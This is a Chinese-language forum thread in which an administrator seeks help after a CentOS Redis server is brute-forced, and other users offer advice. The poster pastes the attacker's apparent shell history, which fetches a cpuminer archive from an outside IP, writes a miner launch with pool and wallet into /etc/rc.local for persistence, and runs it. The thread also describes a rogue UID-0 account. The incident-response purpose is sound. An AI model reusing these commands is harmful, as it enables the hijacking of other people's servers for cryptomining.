服务器被攻击了，急！在线等！

nw5452

环境：CentOS 6.5

现状：root密码被暴力破解
1.查secure日志发下：ov 22 04:11:27 prd-vm-sta1-pay1 sshd[4500]: Connection closed by 185.106.94.57，攻击者是俄罗斯的IP。

2.通过top查看，发现异常进程
23170 root      20   0 21260  272  200 S  0.3  0.0   0:01.95 rhsegvfnis   

查找源：
/proc/23170下看到：lrwxrwxrwx 1 root root 0 Nov 23 11:42 exe -> /boot/rhsegvfnis


我删除这个目录后，发现还是会在/boot下再次创建其他文件并自动执行。

/etc/passwd文件里发现被创建了一个非法用户，使用userdel无法删除，好像跟root做了关联：
beef-xbdb:0:0::/root:/bin/bash

在/var/tmp下创建了如下文件：
-rw-r--r--.  1 root root   84 Jul  5 16:19 a.sh
drwxr-xr-x   2 root root 4096 Nov 23 11:04 hsperfdata_root
drwx------   2 root root 4096 Nov 23 10:54 ssh-HpJfC29744
drwx------   2 root root 4096 Nov 23 10:44 ssh-Inrki29607

请问各位大神，接下来我要怎么做？

现在有几台服务器因为nfs端口的问题（做了固定后，发现程序运行报错），没有启动iptables。

请各位帮忙解决，如需要相关信息，我会马上提供的。

nw5452

522  echo 'wget htp://211.79.60.17/project/cpuminer/pooler-cpuminer-2.4.2-linux-x86_64.tar.gz'> /tmp/1.sh
523  echo 'tar -xzf pooler-cpuminer-2.4.2-linux-x86_64.tar.gz'>>/tmp/1.sh
524  sed -i '/LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk/d' /etc/rc.local
525  ps -ef |grep minerd |awk '{print $2}'|xargs kill -9
526  echo '/tmp/minerd -a scrypt  -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk' >>/etc/rc.local
527  echo 'setsid /tmp/minerd -a scrypt  -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk &'>>/tmp/1.sh
528  chmod +x /tmp/1.sh
529  cd /tmp
530  ./1.sh&
531  exit
532  ifconfig
533  exit
534  locate redis.conf
535  find / -name "redis.conf"
536  vim /usr/local/redis-2.6.17/redis.conf
537  reboot
538  exit
539  netstat -an | grep 6379
540  locate redis.conf
541  find / -name "redis.conf
542  find / -name "redis.conf"
543  find / -name "redis-server"
544  /usr/local/redis-2.6.17/src/redis-server
545  netstat -an | grep 6379
546  /usr/local/redis-2.6.17/src/redis-server &
547  netstat -an | grep 6379

上面应该是攻击者的操作记录

nw5452

我用last看了下
root     pts/0        42.62.3.141      Sun Nov 22 00:21 - 00:23  (00:02)   
root     pts/1        199.244.49.184   Sat Nov 21 14:31 - 14:35  (00:04)   --美国IP

应该是美国的IP做的。

crontab没有异常。

我已经把/etc/rc.local下的'/LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk/d' 删除了。

haooooaaa

这似乎是用你的服务器挖矿的，

nw5452

回复 4# haooooaaa


   请问我现在要如何处理，现在找不到自动生成文件的源码在哪。。

请指点。

nw5452

请各位帮忙分析下。多谢了。

baoersc

帮您顶一下。没有遇到过这个类问题。

baoersc

服务器前端有没有防火墙或路由器，如果有的话，先进行ACL限制。然后再进行服务器问题的处理。

nw5452

我这个服务器是redis server，听说现在可以通过端口做个证书登录到我的服务器，因为做的keepalive，所以我无法彻底删除他的程序，每次删除文件源，再kill进程后，都会自动生成新的。

应该是4楼的朋友说的，挖矿呢。。。

目前的解决方法貌似只能重做系统。。

shujuk

看看有哪些程序在运行，有没有程序被替换掉？是否可以对比下程序的MD5值？